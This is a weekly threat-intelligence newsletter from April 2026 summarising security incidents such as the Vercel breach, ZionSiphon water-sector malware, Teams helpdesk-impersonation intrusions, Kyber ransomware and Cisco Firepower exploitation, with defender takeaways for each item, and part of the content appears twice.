Threat Newsletter April 27, 2026
This week’s threat intel highlights a wave of account-takeover and social-engineering intrusions, escalating ransomware and OT/ICS risks, and continued DDoS and perimeter-device exploitation—reinforcing the need to harden identity controls, rotate secrets, patch fast, and tightly segment and monitor critical infrastructure.
Vercel Confirms Security Breach After Hackers Claim Stolen Data for Sale
Vercel confirmed a security incident involving unauthorized access to some internal Vercel systems, and said a limited subset of customers was affected.
Key Takeaways
Confirmed breach: Vercel acknowledged unauthorized access to internal systems; limited customer impact.
Entry point: Third-party OAuth/Google Workspace compromise led to employee account takeover.
What enabled expansion: Exposure of environment variables marked “non-sensitive” (not encrypted at rest) helped the attacker enumerate and escalate.
Operational impact: No service outage reported.
Attacker claims: A threat actor claimed stolen data/keys for sale, but details/attribution are not fully verified.
Action for defenders/customers: Review and rotate secrets, and ensure sensitive environment variables are properly marked/encrypted.
Lawrence Abrams
New “ZionSiphon” OT Malware Aims at Water Infrastructure
ZionSiphon is a newly analyzed malware sample built to bridge traditional IT infection with OT/ICS-aware behaviors, with logic that strongly suggests it’s meant for water treatment/desalination environments.
Key Takeaways
Target: Water sector OT/ICS (desalination, wastewater, water treatment).
Core behavior: Mixes normal malware tradecraft (priv-esc, persistence) with ICS discovery + process-manipulation intent.
OT capabilities: Scans local networks for ICS devices and probes Modbus/DNP3/S7comm (Modbus looks most developed).
Potential impact: Attempts to tamper with chlorine dosing and pressure values—could disrupt treatment processes if successfully applied.
Propagation: Includes USB/removable media spread techniques.
Maturity: Likely under development (incomplete protocol code + execution logic issues); may fail to detonate and self-delete.
Why it matters: Even if this sample is buggy, it signals continued adversary interest in directly manipulating physical/industrial processes, not just stealing data.
Alessandro Mascellino
Bluesky Blames Platform Outage on “Sophisticated” DDoS Attack
Bluesky said a widespread outage on its social platform was caused by a “sophisticated” DDoS attack that disrupted multiple core features.
Key Takeaways
Cause: Bluesky blames the outage on a DDoS attack (availability disruption, not a confirmed breach).
Impact: Multiple features were affected (feeds, notifications, threads, search).
Timeline: Began Apr 15; stabilized by Apr 16 while attacks continued.
Data risk: Bluesky said no evidence of private user data access.
Attribution: No confirmed attribution from Bluesky; 313 Team claimed responsibility and said it targeted the API.
Daryna Antoniuk
Scattered Spider Member Pleads Guilty in U.S. Crypto Theft Case
A British man alleged to be a leader in the Scattered Spider cybercrime collective pleaded guilty in the U.S. to wire fraud and aggravated identity theft.
Key Takeaways
What happened: Alleged Scattered Spider leader pleaded guilty (wire fraud + aggravated identity theft).
Impact: Scheme tied to $8M+ in crypto theft and dozens of victims (companies + individuals).
How they did it: SMS phishing → credential theft/PII → SIM swapping → wallet takeover/transfers.
Why it matters: Reinforces Scattered Spider’s core playbook: social engineering + identity/telecom abuse, not “zero-days.”
Defender actions: Harden against smishing, lock down helpdesk/identity verification, enforce phishing-resistant MFA (FIDO2/WebAuthn), add SIM-swap/number-port protections, and monitor for MFA fatigue + account takeover signals.
Sergiu Gatlan
Serial-to-IP Converter Flaws Expose OT and Healthcare Systems to Remote Attacks
Researchers uncovered several serious flaws in Serial-to-IP converters (also called serial device servers). Since these boxes connect legacy serial and ICS gear to Ethernet networks, an attacker who compromises one remotely could use it as a foothold into OT and healthcare environments.
Key Takeaways
What’s affected: Serial-to-IP converters / serial device servers used across OT and healthcare (and many other sectors).
Why it matters: These devices often sit in “in-between” network zones and can become an easy bridge into critical systems if exposed or reachable internally.
Potential attacker outcomes: RCE/command injection, device takeover, file upload, auth bypass, firmware tampering, DoS.
Real-world impact examples: Attackers could manipulate sensor data (hiding dangerous conditions) or brick/disrupt devices in healthcare workflows (lost connectivity for monitors/telemetry, lab backlogs, etc.).
Status/mitigation: Patch available (Lantronix/Silex advisories; CISA advisory for Lantronix). Prioritize: patching, remove internet exposure, restrict management access, and segment/monitor these bridge devices like critical OT assets.
Anna Ribeiro
Ransomware Disruption in London NHS Continues, With Backlogs and Safety Incidents
A ransomware attack that occurred in June 2024 by the Qilin ransomware group continues to reverberate. Internal documents show at least one NHS trust is still working without fully restored systems and managing large backlogs of delayed test results, restricted blood supplies, the theft and publication of sensitive patient data and delayed treatment of highly time sensitive conditions like cancer.
Key Takeaways
Incident: June 2024 ransomware attack on Synnovis disrupted blood testing and care across South East London.
Long-tail impact: 18+ months later, at least one NHS trust is still not fully restored and is operating with business-continuity workarounds (paper/PDF + manual uploads).
Patient-safety risk: Delays can mean test results aren’t available when needed; workarounds introduce risk of delays, transcription errors, and patient misidentification.
Scale of disruption (reported): Thousands of outpatient appointments and elective procedures were postponed; significant backlogs of pathology reporting persisted in some areas.
Data exposure: Attack involved theft/publication of sensitive patient data; reporting suggests up to ~1M patients may have been impacted, with notifications delayed for many.
Threat actor: Attack attributed in reporting to the Qilin ransomware group
Alexander Martin
Global Crackdown Disrupts DDoS-for-Hire Services; Four Arrested
A coordinated international law-enforcement operation (Operation PowerOFF) disrupted multiple DDoS-for-hire services that sell cheap, on-demand DDoS attacks.
Key Takeaways
What happened: Multi-country PowerOFF action targeted DDoS-for-hire platforms.
Enforcement results: 4 arrests, 25 search warrants, and 50+ domains seized (per Europol).
Scale: Authorities said they identified roughly 75,000 users of the services.
US action: DOJ seized eight sites (including Vac Stresser and Mythical Stress) and searched backend servers.
Why it matters: “Stresser” sites provide a low barrier to entry for disruption/extortion—making DDoS accessible to non-technical actors.
Jonathan Greig
RedSun: Microsoft Defender Flaw Lets Attackers Gain SYSTEM Privileges
A security researcher released a proof-of-concept exploit for a new Microsoft Defender local privilege escalation (LPE) zero-day dubbed “RedSun.”
Key Takeaways
What it is: A Microsoft Defender LPE zero-day PoC (“RedSun”) that can grant SYSTEM privileges.
Who’s affected: Windows 10, Windows 11, and Windows Server systems that are fully patched (April 2026) with Defender enabled.
Attack type: Local privilege escalation — attacker generally needs code execution on the host already, then uses this to become SYSTEM.
How it works (high level): Abuses Defender behavior around cloud-tagged detection / file rewrite to enable system file overwrite → SYSTEM execution.
Validation: Another analyst (Will Dormann) reported it works on fully patched systems.
Why it matters: Converts a foothold (standard user) into full machine takeover; increases risk/severity of phishing/malware that lands initial access.
Lawrence Abrams
Mirai Variant “Nexcorium” Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS
Nexcorium is a Mirai-based botnet variant that’s being used to compromise TBK DVR (digital video recorder) devices by exploiting CVE-2024-3721.
Key Takeaways
What it is: Nexcorium, a Mirai variant (IoT botnet malware).
Initial access: Exploits CVE-2024-3721 to compromise TBK DVRs.
Goal/impact: Turns infected DVRs into botnet nodes used for DDoS attacks.
Why it matters: IoT devices like DVRs often stay unpatched and internet-exposed, making them high-leverage DDoS infrastructure.
Defender actions: Identify TBK DVR exposure, patch/mitigate CVE-2024-3721, remove direct internet access, restrict management interfaces, and monitor for unusual outbound traffic typical of botnet activity.
Varshini
CISA Reportedly Left Out as Anthropic Shares “Mythos” With 40+ Organizations
CISA, the U.S. agency many critical-infrastructure teams rely on for shared cybersecurity guidance, reportedly does not currently have access to Anthropic’s new AI security tool, “Mythos,” even as Anthropic has provided it to 40+ organizations for testing.
Key Takeaways
Main point: CISA isn’t on the list of organizations currently getting access to Anthropic’s Mythos**.**
Access elsewhere: Mythos has reportedly been shared with 40+ organizations, and parts of the U.S. government ecosystem (e.g., Commerce and NSA) are cited as having access/testing.
Why it matters: CISA is a key “hub” for sharing threat intel and prioritization guidance across critical infrastructure; lack of access could slow or limit broad sector-wide benefit.
What to watch: Whether Mythos insights end up being distributed via other agencies (Commerce/NSA) and how that affects speed, transparency, and consistency of guidance to industry.
Lauren Feiner
Threat Actors Pose as Helpdesk in External Teams Chats to Gain Remote Control
Threat actors are increasingly using external Microsoft Teams chats to impersonate an organization’s IT/helpdesk and socially engineer employees into granting remote access.
Key Takeaways
Initial lure: External Teams message pretending to be helpdesk/IT (“account issue” / “security update”).
Initial access method: Victim is tricked into starting a Quick Assist (or similar) remote support session.
Living-off-the-land: Attack chain uses legit tools + native admin protocols, making detection harder.
Post-compromise actions: Recon via PowerShell/CMD, persistence via registry changes, lateral movement via WinRM, then deploy more tooling.
Data theft: The threat actors use Rclone used to exfiltrate data to external cloud storage; often targeted to reduce noise.
Defensive focus: Treat external Teams chats as untrusted, restrict/monitor remote assistance tools, and tightly control/monitor WinRM and other lateral-movement pathways.
Bill Toulas
Insider Betrayal: Ransomware Negotiator Shared Victim Insurance Limits With BlackCat
A former ransomware negotiator at an incident response firm pleaded guilty to participating in BlackCat (ALPHV) ransomware/extortion activity.
Key Takeaways
Who/what: Former DigitalMint employee Angelo Martino pleaded guilty for involvement in BlackCat (ALPHV) attacks.
Breach of trust: As a negotiator, allegedly leaked victim negotiation info + insurance limits to the ransomware crew.
Co-conspirators: Two other negotiators (Sygnia/DigitalMint) also pleaded guilty and face significant prison time.
Impact: Multiple U.S. organizations targeted; reported ransoms include $25.66M (financial services) and $26.793M (nonprofit).
Why it matters: Highlights an insider-risk angle in the ransomware ecosystem—attackers can exploit “trusted” third parties involved in response/negotiation.
Defender takeaway: Treat IR/negotiation engagements as high-trust/high-risk: enforce least privilege, strict information-sharing controls, logging, and separation of duties for anyone with access to victim financial/insurance/negotiation details.
Sergiu Gatlan
Backdoor Allegations Resurface: Iran Points to Western Network Vendors After Disruptions
Iranian media claims the U.S. used backdoor and/or a botnet to remotely disrupt networking equipment inside Iran during the current conflict, causing devices from major vendors to reboot or disconnect even though Iran had largely cut itself off from the global internet.
Key Takeaways
Claim (unverified): Iran alleges the U.S. remotely disrupted network devices via firmware/bootloader backdoors or botnet-style access.
Vendors mentioned: Iranian reports point to equipment from Cisco, Juniper, Fortinet, and MikroTik.
Why it’s hard to confirm: Iran’s internet has been heavily restricted/blocked, making independent validation of widespread outages difficult.
Narrative impact: China is using the story to bolster propaganda that the U.S. is the main cyber aggressor and that “backdoor” accusations against China are deflection.
Defender lens: Regardless of attribution, this underscores the strategic risk of network-device compromise (firmware integrity, supply-chain trust, and segmentation/monitoring of critical network infrastructure).
Simon Sharwood
OpenAI Expands Government Access to GPT-5.4-Cyber With Tiered Vetting and Safeguards
OpenAI has been briefing U.S. federal agencies, state governments, and Five Eyes partners on a new cybersecurity-focused model/product (described as GPT-5.4-Cyber) that’s being rolled out under a tiered, vetted access program
Key Takeaways
What happened: OpenAI demoed/briefed government cyber defenders on GPT-5.4-Cyber and is extending briefings to Five Eyes partners.
Access model: Vetted, tiered access (Trusted Access for Cyber) — government applicants go through similar vetting as commercial customers.
Why it matters: These tools can meaningfully accelerate defensive work (finding and prioritizing exploitable flaws), but also raise concerns about offensive misuse if access controls fail.
Strategic angle: OpenAI is aiming to build channels for threat intel sharing and prioritize key government/critical-infrastructure use cases.
Context: Rollout is happening alongside Anthropic’s Mythos approach (more restricted preview), highlighting a broader push to balance capability vs. controlled distribution.
Ron Schmelzer
Threat Intel April 27, 2026
This week’s threat intel highlights a wave of account-takeover and social-engineering intrusions, escalating ransomware and OT/ICS risks, and continued DDoS and perimeter-device exploitation—reinforcing the need to harden identity controls, rotate secrets, patch fast, and tightly segment and monitor critical infrastructure.
Vercel Confirms Security Breach After Hackers Claim Stolen Data for Sale
Vercel confirmed a security incident involving unauthorized access to some internal Vercel systems, and said a limited subset of customers was affected.
Key Takeaways
Confirmed breach: Vercel acknowledged unauthorized access to internal systems; limited customer impact.
Entry point: Third-party OAuth/Google Workspace compromise led to employee account takeover.
What enabled expansion: Exposure of environment variables marked “non-sensitive” (not encrypted at rest) helped the attacker enumerate and escalate.
Operational impact: No service outage reported.
Attacker claims: A threat actor claimed stolen data/keys for sale, but details/attribution are not fully verified.
Action for defenders/customers: Review and rotate secrets, and ensure sensitive environment variables are properly marked/encrypted.
Vercel confirms breach as hackers claim to be selling stolen data
New “ZionSiphon” OT Malware Aims at Water Infrastructure
ZionSiphon is a newly analyzed malware sample built to bridge traditional IT infection with OT/ICS-aware behaviors, with logic that strongly suggests it’s meant for water treatment/desalination environments.
Key Takeaways
Target: Water sector OT/ICS (desalination, wastewater, water treatment).
Core behavior: Mixes normal malware tradecraft (priv-esc, persistence) with ICS discovery + process-manipulation intent.
OT capabilities: Scans local networks for ICS devices and probes Modbus/DNP3/S7comm (Modbus looks most developed).
Potential impact: Attempts to tamper with chlorine dosing and pressure values—could disrupt treatment processes if successfully applied.
Propagation: Includes USB/removable media spread techniques.
Maturity: Likely under development (incomplete protocol code + execution logic issues); may fail to detonate and self-delete.
Why it matters: Even if this sample is buggy, it signals continued adversary interest in directly manipulating physical/industrial processes, not just stealing data.
ZionSiphon Malware Targets Water Infrastructure Systems
Bluesky Blames Platform Outage on “Sophisticated” DDoS Attack
Bluesky said a widespread outage on its social platform was caused by a “sophisticated” DDoS attack that disrupted multiple core features.
Key Takeaways
Cause: Bluesky blames the outage on a DDoS attack (availability disruption, not a confirmed breach).
Impact: Multiple features were affected (feeds, notifications, threads, search).
Timeline: Began Apr 15; stabilized by Apr 16 while attacks continued.
Data risk: Bluesky said no evidence of private user data access.
Attribution: No confirmed attribution from Bluesky; 313 Team claimed responsibility and said it targeted the API.
Bluesky blames app outage on ‘sophisticated’ DDoS attack
Scattered Spider Member Pleads Guilty in U.S. Crypto Theft Case
A British man alleged to be a leader in the Scattered Spider cybercrime collective pleaded guilty in the U.S. to wire fraud and aggravated identity theft.
Key Takeaways
What happened: Alleged Scattered Spider leader pleaded guilty (wire fraud + aggravated identity theft).
Impact: Scheme tied to $8M+ in crypto theft and dozens of victims (companies + individuals).
How they did it: SMS phishing → credential theft/PII → SIM swapping → wallet takeover/transfers.
Why it matters: Reinforces Scattered Spider’s core playbook: social engineering + identity/telecom abuse, not “zero-days.”
Defender actions: Harden against smishing, lock down helpdesk/identity verification, enforce phishing-resistant MFA (FIDO2/WebAuthn), add SIM-swap/number-port protections, and monitor for MFA fatigue + account takeover signals.
British Scattered Spider hacker pleads guilty to crypto theft charges
Serial-to-IP Converter Flaws Expose OT and Healthcare Systems to Remote Attacks
Researchers uncovered several serious flaws in Serial-to-IP converters (also called serial device servers). Since these boxes connect legacy serial and ICS gear to Ethernet networks, an attacker who compromises one remotely could use it as a foothold into OT and healthcare environments.
Key Takeaways
What’s affected: Serial-to-IP converters / serial device servers used across OT and healthcare (and many other sectors).
Why it matters: These devices often sit in “in-between” network zones and can become an easy bridge into critical systems if exposed or reachable internally.
Potential attacker outcomes: RCE/command injection, device takeover, file upload, auth bypass, firmware tampering, DoS.
Real-world impact examples: Attackers could manipulate sensor data (hiding dangerous conditions) or brick/disrupt devices in healthcare workflows (lost connectivity for monitors/telemetry, lab backlogs, etc.).
Status/mitigation: Patch available (Lantronix/Silex advisories; CISA advisory for Lantronix). Prioritize: patching, remove internet exposure, restrict management access, and segment/monitor these bridge devices like critical OT assets.
BRIDGE:BREAK Report - Forescout
Ransomware Disruption in London NHS Continues, With Backlogs and Safety Incidents
A ransomware attack that occurred in June 2024 by the Qilin ransomware group continues to reverberate. Internal documents show at least one NHS trust is still working without fully restored systems and managing large backlogs of delayed test results, restricted blood supplies, the theft and publication of sensitive patient data and delayed treatment of highly time sensitive conditions like cancer.
Key Takeaways
Incident: June 2024 ransomware attack on Synnovis disrupted blood testing and care across South East London.
Long-tail impact: 18+ months later, at least one NHS trust is still not fully restored and is operating with business-continuity workarounds (paper/PDF + manual uploads).
Patient-safety risk: Delays can mean test results aren’t available when needed; workarounds introduce risk of delays, transcription errors, and patient misidentification.
Scale of disruption (reported): Thousands of outpatient appointments and elective procedures were postponed; significant backlogs of pathology reporting persisted in some areas.
Data exposure: Attack involved theft/publication of sensitive patient data; reporting suggests up to ~1M patients may have been impacted, with notifications delayed for many.
Threat actor: Attack attributed in reporting to the Qilin ransomware group.
Ransomware attack continues to disrupt healthcare in London nearly two years later
Global Crackdown Disrupts DDoS-for-Hire Services; Four Arrested
A coordinated international law-enforcement operation (Operation PowerOFF) disrupted multiple DDoS-for-hire services that sell cheap, on-demand DDoS attacks.
Key Takeaways
What happened: Multi-country PowerOFF action targeted DDoS-for-hire platforms.
Enforcement results: 4 arrests, 25 search warrants, and 50+ domains seized (per Europol).
Scale: Authorities said they identified roughly 75,000 users of the services.
US action: DOJ seized eight sites (including Vac Stresser and Mythical Stress) and searched backend servers.
Why it matters: “Stresser” sites provide a low barrier to entry for disruption/extortion—making DDoS accessible to non-technical actors.
Four arrested in latest ‘PowerOFF’ DDoS-for-hire takedown
RedSun: Microsoft Defender Flaw Lets Attackers Gain SYSTEM Privileges
A security researcher released a proof-of-concept exploit for a new Microsoft Defender local privilege escalation (LPE) zero-day dubbed “RedSun.”
Key Takeaways
What it is: A Microsoft Defender LPE zero-day PoC (“RedSun”) that can grant SYSTEM privileges.
Who’s affected: Windows 10, Windows 11, and Windows Server systems that are fully patched (April 2026) with Defender enabled.
Attack type: Local privilege escalation — attacker generally needs code execution on the host already, then uses this to become SYSTEM.
How it works (high level): Abuses Defender behavior around cloud-tagged detection / file rewrite to enable system file overwrite → SYSTEM execution.
Validation: Another analyst (Will Dormann) reported it works on fully patched systems.
Why it matters: Converts a foothold (standard user) into full machine takeover; increases risk/severity of phishing/malware that lands initial access.
New Microsoft Defender “RedSun” zero-day PoC grants SYSTEM privileges
Mirai Variant “Nexcorium” Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS
Nexcorium is a Mirai-based botnet variant that’s being used to compromise TBK DVR (digital video recorder) devices by exploiting CVE-2024-3721.
Key Takeaways
What it is: Nexcorium, a Mirai variant (IoT botnet malware).
Initial access: Exploits CVE-2024-3721 to compromise TBK DVRs.
Goal/impact: Turns infected DVRs into botnet nodes used for DDoS attacks.
Why it matters: IoT devices like DVRs often stay unpatched and internet-exposed, making them high-leverage DDoS infrastructure.
Defender actions: Identify TBK DVR exposure, patch/mitigate CVE-2024-3721, remove direct internet access, restrict management interfaces, and monitor for unusual outbound traffic typical of botnet activity.
Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
CISA Reportedly Left Out as Anthropic Shares “Mythos” With 40+ Organizations
CISA, the U.S. agency many critical-infrastructure teams rely on for shared cybersecurity guidance, reportedly does not currently have access to Anthropic’s new AI security tool, “Mythos,” even as Anthropic has provided it to 40+ organizations for testing.
Key Takeaways
Main point: CISA isn’t on the list of organizations currently getting access to Anthropic’s Mythos**.**
Access elsewhere: Mythos has reportedly been shared with 40+ organizations, and parts of the U.S. government ecosystem (e.g., Commerce and NSA) are cited as having access/testing.
Why it matters: CISA is a key “hub” for sharing threat intel and prioritization guidance across critical infrastructure; lack of access could slow or limit broad sector-wide benefit.
What to watch: Whether Mythos insights end up being distributed via other agencies (Commerce/NSA) and how that affects speed, transparency, and consistency of guidance to industry.
Scoop: Top U.S. cyber agency doesn't have access to Anthropic's powerful hacking model
Threat Actors Pose as Helpdesk in External Teams Chats to Gain Remote Control
Threat actors are increasingly using external Microsoft Teams chats to impersonate an organization’s IT/helpdesk and socially engineer employees into granting remote access.
Key Takeaways
Initial lure: External Teams message pretending to be helpdesk/IT (“account issue” / “security update”).
Initial access method: Victim is tricked into starting a Quick Assist (or similar) remote support session.
Living-off-the-land: Attack chain uses legit tools + native admin protocols, making detection harder.
Post-compromise actions: Recon via PowerShell/CMD, persistence via registry changes, lateral movement via WinRM, then deploy more tooling.
Data theft: The threat actors use Rclone used to exfiltrate data to external cloud storage; often targeted to reduce noise.
Defensive focus: Treat external Teams chats as untrusted, restrict/monitor remote assistance tools, and tightly control/monitor WinRM and other lateral-movement pathways.
Microsoft: Teams increasingly abused in helpdesk impersonation attacks
Insider Betrayal: Ransomware Negotiator Shared Victim Insurance Limits With BlackCat
A former ransomware negotiator at an incident response firm pleaded guilty to participating in BlackCat (ALPHV) ransomware/extortion activity.
Key Takeaways
Who/what: Former DigitalMint employee Angelo Martino pleaded guilty for involvement in BlackCat (ALPHV) attacks.
Breach of trust: As a negotiator, allegedly leaked victim negotiation info + insurance limits to the ransomware crew.
Co-conspirators: Two other negotiators (Sygnia/DigitalMint) also pleaded guilty and face significant prison time.
Impact: Multiple U.S. organizations targeted; reported ransoms include $25.66M (financial services) and $26.793M (nonprofit).
Why it matters: Highlights an insider-risk angle in the ransomware ecosystem—attackers can exploit “trusted” third parties involved in response/negotiation.
Defender takeaway: Treat IR/negotiation engagements as high-trust/high-risk: enforce least privilege, strict information-sharing controls, logging, and separation of duties for anyone with access to victim financial/insurance/negotiation details.
Former ransomware negotiator pleads guilty to BlackCat attacks
Backdoor Allegations Resurface: Iran Points to Western Network Vendors After Disruptions
Iranian media claims the U.S. used backdoor and/or a botnet to remotely disrupt networking equipment inside Iran during the current conflict, causing devices from major vendors to reboot or disconnect even though Iran had largely cut itself off from the global internet.
Key Takeaways
Claim (unverified): Iran alleges the U.S. remotely disrupted network devices via firmware/bootloader backdoors or botnet-style access.
Vendors mentioned: Iranian reports point to equipment from Cisco, Juniper, Fortinet, and MikroTik.
Why it’s hard to confirm: Iran’s internet has been heavily restricted/blocked, making independent validation of widespread outages difficult.
Narrative impact: China is using the story to bolster propaganda that the U.S. is the main cyber aggressor and that “backdoor” accusations against China are deflection.
Defender lens: Regardless of attribution, this underscores the strategic risk of network-device compromise (firmware integrity, supply-chain trust, and segmentation/monitoring of critical network infrastructure).
Iran claims US used backdoors in networking equipment
OpenAI Expands Government Access to GPT-5.4-Cyber With Tiered Vetting and Safeguards
OpenAI has been briefing U.S. federal agencies, state governments, and Five Eyes partners on a new cybersecurity-focused model/product (described as GPT-5.4-Cyber) that’s being rolled out under a tiered, vetted access program
Key Takeaways
What happened: OpenAI demoed/briefed government cyber defenders on GPT-5.4-Cyber and is extending briefings to Five Eyes partners.
Access model: Vetted, tiered access (Trusted Access for Cyber) — government applicants go through similar vetting as commercial customers.
Why it matters: These tools can meaningfully accelerate defensive work (finding and prioritizing exploitable flaws), but also raise concerns about offensive misuse if access controls fail.
Strategic angle: OpenAI is aiming to build channels for threat intel sharing and prioritize key government/critical-infrastructure use cases.
Context: Rollout is happening alongside Anthropic’s Mythos approach (more restricted preview), highlighting a broader push to balance capability vs. controlled distribution.
Exclusive: OpenAI briefs feds and Five Eyes on new cyber product
Mozilla Leans on AI Bug-Finding to Harden Firefox Ahead of Attacker Use
Mozilla said it used early access to Anthropic’s Mythos Preview (an AI security tool) to help identify 271 vulnerabilities that were then addressed in the Firefox 150 release.
Key Takeaways
Outcome: Firefox 150 includes fixes/protections for 271 bugs found with Mythos Preview.
Signal: AI-assisted security testing is meaningfully increasing bug discovery volume and speed.
Operational reality: More findings means more triage + engineering lift to turn detections into real fixes.
Why it matters: Defensive teams are racing to use these tools first, since attackers will get comparable capability over time.
Big picture: AI is shifting vulnerability discovery toward “who can process the most findings fastest,” not just who can find bugs at all.
Lily Hay Newman
From Fake Interviews to Supply Chain Risk: DPRK Campaign Self-Propagates Through Developer Tools
North Korean threat actors are evolving the long-running “fake job interview” lure into something that can self-propagate through the developer ecosystem.
Key Takeaways
Threat: DPRK “Contagious Interview” fake recruiter/job scams targeting software developers.
What changed: It’s no longer just one-off social engineering — infected repos can spread to other repos (worm-like supply chain behavior).
Initial access: Victims are asked to clone/run a repo during a fake interview “coding test.”
Execution trick: Abuse of VS Code workspace tasks—if the victim accepts the workspace trust prompt, tasks can execute and drop malware.
Payload/impact: RATs + credential/secret theft (crypto wallet creds, signing keys, CI/CD and production access), enabling broader org compromise.
Defender takeaways: Treat interview code as untrusted; run in an isolated VM/container with no tokens/secrets, enforce dependency hygiene (lockfiles/integrity checks), and ensure endpoint protection + VS Code Workspace Trust policies are in place.
Contact Us
Kyber Ransomware “Goes Post-Quantum” on Windows While Hitting ESXi Environments
Rapid7 observed Kyber, a relatively new ransomware operation, deploying two encryptors in a single incident, one for VMware ESXi and one for Windows, to increase impact by encrypting both server types.
Key Takeaways
Targeting: Kyber hits Windows file servers and VMware ESXi in the same campaign.
Two variants: ESXi-focused Linux encryptor + Windows encryptor (Rust) deployed together.
“Post-quantum” angle: Windows variant: uses Kyber1024 + X25519 to protect key material; AES-CTR does bulk file encryption.
ESXi variant: “Post-quantum” claim appears false; uses ChaCha8 + RSA-4096 instead.
Operational impact: Doesn’t meaningfully change victim outcomes—encryption is still effective without attacker keys.
Anti-recovery behavior (Windows): Terminates services, deletes backups/shadow copies, clears logs, etc.; also mentions experimental Hyper‑V targeting.
Defender focus: Prioritize ESXi hardening, backup immutability/offline backups, and monitoring for common pre-encryption behaviors (service stops, shadow copy deletion, mass file renames/extensions).
Bill Toulas
Apple Patches iOS Bug Used by FBI to Recover Deleted Signal Message Notifications
Apple released iOS/iPadOS 26.4.2 to fix a bug where notifications marked for deletion could be unexpectedly retained on the device.
Key Takeaways
What was fixed: iOS Notifications bug where “deleted” notifications could still remain on-device.
How it was used: FBI reportedly recovered incoming Signal message preview content from the notification database.
Scope/limits: This exposed notification previews (name/partial content if previews were enabled), not full Signal message history—and primarily received messages.
Who was most at risk: People with Signal (or other apps) set to show message previews on the lock screen/notifications.
What to do: Update to iOS/iPadOS 26.4.2; for extra privacy, set Signal notifications to no previews (or no name/no content) and consider tightening lock-screen notification visibility.
Lance Whitney
UNC6692 Impersonates IT Helpdesk in Microsoft Teams to Deploy SNOW Malware
UNC6692 is a threat cluster documented by Mandiant that uses Microsoft Teams-based helpdesk impersonation to socially engineer victims and deploy a custom malware toolkit (the “SNOW*” family).*
Key Takeaways
Initial social engineering: Email bombing → attacker “helpdesk” reaches out in cross-tenant Microsoft Teams offering help.
Delivery method: Victim is sent a Teams phishing link (“Mailbox Repair and Sync Utility”) that downloads an AutoHotkey script from AWS S3.
Key payloads: Modular “SNOW” toolkit:
- SNOWBELT = malicious Chromium/Edge extension (JS backdoor)
- SNOWBASIN = persistent backdoor (cmd/PowerShell exec, file ops, screenshots)
- SNOWGLAZE = tunneler (WebSocket tunnel to attacker C2)
Credential theft: The “Health Check” flow prompts for mailbox creds and exfiltrates them to S3.
Post-exploitation: Internal scanning + lateral movement (ports 135/445/3389), LSASS dumping, pass-the-hash to DCs, AD data collection, and exfiltration.
Defender focus: Treat Teams external chats as untrusted, enforce helpdesk verification workflows, restrict external Teams/screen-sharing, and monitor for Edge extension sideloading, AutoHotkey execution, and unusual S3 traffic/exfiltration patterns.
Mandiant
Trigona Ransomware Deploys Custom Exfiltration Tool to Steal Data Faster and Stay Stealthy
Trigona ransomware operators have been observed using a custom-built data exfiltration tool (“uploader_client.exe”) during recent intrusions to steal files faster and more quietly than with common tools like Rclone or MegaSync. Researchers assess this as an attempt to lower detection during the “data theft” phase of double-extortion, while the rest of the intrusion still includes aggressive steps to disable defenses, maintain access, and harvest credentials before encryption/extortion.
Key Takeaways
Why it matters: Custom tooling can evade detections tuned for known utilities (Rclone/MegaSync) and reduce defender visibility.
Exfil capabilities (notable):
- Parallel uploads (up to 5 simultaneous connections per file) for speed
- TCP rotation after ~2GB to evade monitoring thresholds
- Selective targeting (skip large low-value media)
- Auth key to restrict outsider access to stolen data
Observed targeting: High-value docs like invoices and PDFs on network drives.
Broader tradecraft: Includes defense evasion/kill tools and credential theft (e.g., AnyDesk for remote access; Mimikatz/NirSoft; vulnerable driver abuse to terminate security tooling).
Bill Toulas
ADT Data Breach: ShinyHunters Alleges Okta Vishing Led to Salesforce Data Theft
ADT confirmed a data breach after the threat group ShinyHunters claimed it stole 10M+ records and issued a “pay or leak” ultimatum.
Key Takeaways
What happened: ADT confirmed unauthorized access to cloud systems after ShinyHunters publicly claimed the breach.
Where data was taken from: Salesforce customer/prospect records.
What data may be exposed: Mainly names, phone numbers, and home addresses; in some cases DOB and last 4 of SSN/Tax ID.
What was not accessed (per ADT): No bank/credit card info, and home security systems remained operational/secure.
Response actions: Access was terminated, IR plan activated, external forensics engaged, law enforcement notified, and impacted individuals notified.
Why it matters: This is another example of identity provider/SSO compromise leading to downstream SaaS data theft—strong reminder to harden against social-engineering-based account takeover (Okta, helpdesk processes, MFA, etc.).
Guru Baran
Cisco Firepower Under Active Exploitation: CVE-2025-20333 & CVE-2025-20362 Used in the Wild
Cisco Talos reports state-sponsored threat actors (UAT-4356) are actively targeting Cisco Firepower perimeter devices by chaining two known (“n-day”) vulnerabilities—CVE-2025-20333 and CVE-2025-20362—to gain access to FXOS environments.
Key Takeaways
Who: UAT-4356 (espionage-focused, state-sponsored activity per Talos).
What: Real-world exploitation of Cisco Firepower/FXOS devices.
How: Chaining two n-day CVEs (CVE-2025-20333, CVE-2025-20362) to get in, then deploying FIRESTARTER.
Why it matters: This is perimeter infrastructure compromise → persistent access → network-wide risk and potential intelligence collection.
Defender actions:
- Patch/upgrade immediately per Cisco guidance and CISA Emergency Directive 25-03.
- Hunt for FIRESTARTER artifacts (unexpected processes / suspicious temp log/core files).
- If compromised, reimage affected devices (Talos guidance suggests this is the cleanest way to remove the implant).
- Add network detection using Snort rules 65340 & 46897 (exploit activity) and 62949 (backdoor behavior).
Abinaya
